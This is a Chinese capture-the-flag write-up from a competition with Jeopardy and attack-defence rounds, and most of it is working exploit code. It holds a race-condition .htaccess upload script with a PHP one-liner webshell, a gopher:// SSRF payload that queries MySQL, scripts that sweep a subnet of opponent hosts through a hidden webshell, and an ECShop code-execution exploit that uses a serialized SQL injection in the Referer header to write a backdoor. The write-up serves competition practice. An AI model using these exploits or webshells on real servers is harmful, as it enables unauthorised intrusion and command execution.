本次大赛,恭喜本战队bleem,取得优异成绩,加油!
Jeopardy
上午解题模式中,给了两个web
web1:
这题上传一个图片.用burp修改php类型上传之后会得到提示,'比比谁速度快',尝试上传.htaccess,也是可以猜想到通过竞争条件一直上传.htaccess,这样再上传一个图片木马,即可获取shell
上传.htaccess脚本
import requests
import time
while True:
files = {
'file': ('.htaccess', open('.htaccess', 'rb'), 'image/jpeg')}
r = requests.post('http://127.0.0.1/upload',files=files)
time.sleep(0.5)
"""
.htaccess:
<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>
"""
再上传一个jpg的图片一句话木马就ok了
shell.jpg
<?php system('cat /flag.txt');?>
web2:
这题可以通过file协议读取/etc/passwd,但是读取file:///flag.txt发现并不存在,读取index.php被禁止,通过F12查看网页源码,发现flag存放在mysql里面,首先想到通过gopher协议读取flag,比赛中没能构造好payload,不管这个方法对不对,也当是学习啦
访问mysql执行查询语句
wireshark抓包,追踪流,过滤出红色的发送数据
把数据转换一下
gopher://127.0.0.1:3306/_%26%00%00%01%85%a6%03%00%00%00%00%01%08%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%28%00%00%00%03%73%65%6c%65%63%74%20%69%6e%66%6f%20%66%72%6f%6d%20%64%76%77%61%2e%63%74%68%61%63%6b%20%77%68%65%72%65%20%69%64%3d%32
CRLF的问题,curl测试结尾加上%0d0a
AWD模式
下午的AWD模式也是只有两个web
web1:
web1在/var/www/html/目录下ls -a可以发现一个隐藏为.shell.php,过滤了flag可以通过cat /fla*绕过
脚本:
import requests
ip1='http://172.20.'
ip2='.101'
ip=[]
for i in range(101,113,1):
ip.append(ip1+str(i)+ip2)
data={
'cmd':'system("cat /fla*");'}
for i in ip:
try:
r=requests.post(i+'/.shell.php',data=data,timeout=0.5)
print i
print r.text
except:
pass
web2:
ECSHOP的代码执行漏洞
先执行curl命令的payload
附上脚本:
import requests
import os
'''
curl "http://172.20.102.102/user.php" -d "action=login&okami=phpinfo();exit;" -H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'
curl "http://172.20.102.102/user.php" -d "action=login&okami=eval/**/(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbChbb2thbWldKTsnKQoOw));exit;" \-H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'
'''
ip1='http://172.20.'
ip2='.102'
ip=[]
for i in range(101,113,1):
ip.append(ip1+str(i)+ip2)
for i in ip:
try:
r=requests.post(i+'/okami.php?okami=system("cat /flag.txt");',timeout=0.5)
print i
print r.text
except:
pass